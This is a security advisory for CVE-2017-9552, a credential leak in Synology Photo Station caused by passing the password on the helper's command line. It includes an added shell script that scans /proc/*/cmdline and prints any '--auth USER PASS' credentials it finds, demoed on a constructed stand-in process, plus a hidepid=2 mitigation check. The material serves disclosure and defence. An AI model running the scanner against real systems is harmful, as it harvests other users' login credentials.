PT-2017-19012 · Synology · Synology Photo Station

Frederic Crozat · Published 2017-06-13 · Updated 2019-10-09 · CVE-2017-9552

CVSS v3.1: 7.8 (High)

Vector: AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Name of the Vulnerable Software and Affected Versions: Synology Photo Station versions 6.0-2528 through 6.7.1-3419
Description: A design flaw in the authentication mechanism of Synology Photo Station allows any local user to obtain DSM credentials. Photo Station authenticates by running the helper synophoto_dsm_user --auth USERNAME PASSWORD, so the user name and password become part of that process's argument vector. On Linux the argument vector of every process is exposed through /proc/<pid>/cmdline (and therefore through ps), which by default is readable by every local account regardless of who owns the process. A local user who polls /proc/*/cmdline while an authentication is in progress recovers the plaintext USERNAME and PASSWORD; each window is short, but logins recur and polling is cheap. The CVSS vector reflects this: local access with low privileges and no user interaction (AV:L/PR:L/UI:N), leading to full compromise of the captured account (C:H/I:H/A:H).
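The leak described above, as an added example that is not Synology's code or part of the advisory: a small POSIX shell scanner that reads /proc/<pid>/cmdline the way any local account can, splits it into argv and reports processes carrying an `--auth USER PASS` pair. The helper name synophoto_dsm_user and the `--auth USERNAME PASSWORD` shape come from the description; the stand-in process, user name and password used in the demo are constructed.

```shell
#!/bin/sh
# Added example, not Synology's code: recover credentials that a process
# passed on its command line by reading /proc/<pid>/cmdline, which is
# world-readable by default on Linux (it is the same data `ps -ef` shows).
# The helper name synophoto_dsm_user and the "--auth USER PASS" shape are
# taken from the advisory; the stand-in process in demo() is constructed.

# Print the argv stored in the cmdline file $1, one argument per line.
# The kernel stores argv NUL-separated; tr turns each NUL into a newline.
argv_of() {
    tr '\0' '\n' < "$1"
}

# If the cmdline file $1 carries "--auth USER PASS", print "USER PASS" and
# return 0; otherwise print nothing and return 1.  Arguments containing
# spaces survive because IFS is set to newline only.  An argument that is
# empty or itself contains a newline would shift the fields (not the case
# for the helper described in the advisory).
auth_from_cmdline() {
    old_ifs=$IFS
    IFS='
'
    set -f                       # no globbing of argv tokens such as '*'
    set -- $(argv_of "$1")
    set +f
    IFS=$old_ifs
    while [ $# -ge 3 ]; do
        if [ "$1" = "--auth" ]; then
            printf '%s %s\n' "$2" "$3"
            return 0
        fi
        shift
    done
    return 1
}

# Walk every process visible in /proc and report the ones exposing an
# "--auth" credential pair.  Processes of other users are visible unless
# /proc is mounted with hidepid=2.
scan_proc() {
    for f in /proc/[0-9]*/cmdline; do
        creds=$(auth_from_cmdline "$f" 2>/dev/null) || continue
        pid=${f#/proc/}
        pid=${pid%/cmdline}
        printf 'pid %s exposes credentials: %s\n' "$pid" "$creds"
    done
    return 0
}

# Demo with a harmless stand-in for the vulnerable helper: "sh -c 'sleep 3; :'"
# only sleeps; the extra words set $0 and $1.. so that its
# /proc/<pid>/cmdline reads "sh -c sleep 3; : synophoto_dsm_user --auth demo-user demo-pass".
# The trailing ":" keeps sh from exec'ing sleep directly, which would
# replace the argv we want to observe.  The one-second pause lets the
# background process finish its exec before we scan.
demo() {
    sh -c 'sleep 3; :' synophoto_dsm_user --auth demo-user demo-pass &
    sleep 1
    scan_proc
    wait
}

demo
```

Run it as an unprivileged user on a default Linux box and the stand-in's credentials are printed even though nothing about the scanner is privileged; that is the whole vulnerability. On a system mounted with hidepid=2 the same scanner sees only its own processes.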
Recommendations: For Synology Photo Station versions 6.0-2528 through 6.7.1-3419, apply the vendor fix as soon as it is available. Until then, reduce exposure by mounting /proc with hidepid=2, which hides other users' /proc/<pid> entries (cmdline included) from unprivileged accounts; on a DSM appliance the remount has to be re-applied after each reboot. This only narrows the window: it does not protect against root, nor against a local user running under the same uid as the helper, and the underlying flaw, passing a secret as a command-line argument, remains until the software stops doing so (secrets belong on stdin, in a pipe or in a file with restrictive permissions, never in argv).
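A check for the mitigation recommended above, added here as an example and not taken from the advisory or from Synology: it parses a mounts table in /proc/mounts format and reports whether /proc is mounted with hidepid=2 (or its alias hidepid=invisible), which is what stops an unprivileged account from reading other users' /proc/<pid>/cmdline. The sample mount lines used for testing are constructed.

```shell
#!/bin/sh
# Added example, not from the advisory: check whether the proc filesystem
# hides other users' processes, the mitigation the advisory points at.
# With hidepid=2 (alias hidepid=invisible) an unprivileged user cannot
# list or read /proc/<pid>/* for processes of other uids, so a helper
# running under another account no longer exposes its argv to them.  It
# does not help against root or against a local user with the same uid,
# and it does not remove the real flaw, which is passing secrets in argv.

# Exit 0 if the mounts table in $1 (same format as /proc/mounts) shows
# /proc mounted with hidepid=2 or hidepid=invisible, else exit 1.
# Fields: device, mount point, fstype, comma-separated options, dump, pass.
proc_hidepid_ok() {
    awk '
        $2 == "/proc" && $3 == "proc" {
            n = split($4, opt, ",")
            for (i = 1; i <= n; i++)
                if (opt[i] == "hidepid=2" || opt[i] == "hidepid=invisible")
                    ok = 1
        }
        END { exit (ok ? 0 : 1) }
    ' "$1"
}

# Report on the running system.  Remounting needs root, and on a DSM
# appliance it must be repeated after every reboot.
if proc_hidepid_ok /proc/mounts 2>/dev/null; then
    echo "/proc hides other users' processes (hidepid=2 is set)"
else
    echo "/proc is world-readable: other local users can read the cmdline of your processes"
    echo "mitigation (as root): mount -o remount,hidepid=2 /proc"
fi
```

The check deliberately requires the exact option value: hidepid=1 still lets other users list /proc/<pid> and read cmdline, so it would not close this leak.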

Weakness Enumeration

Insufficiently Protected Credentials (CWE-522)

Improper Authentication (CWE-287)

Related identifiers

CVE-2017-9552

Affected products

Synology Photo Station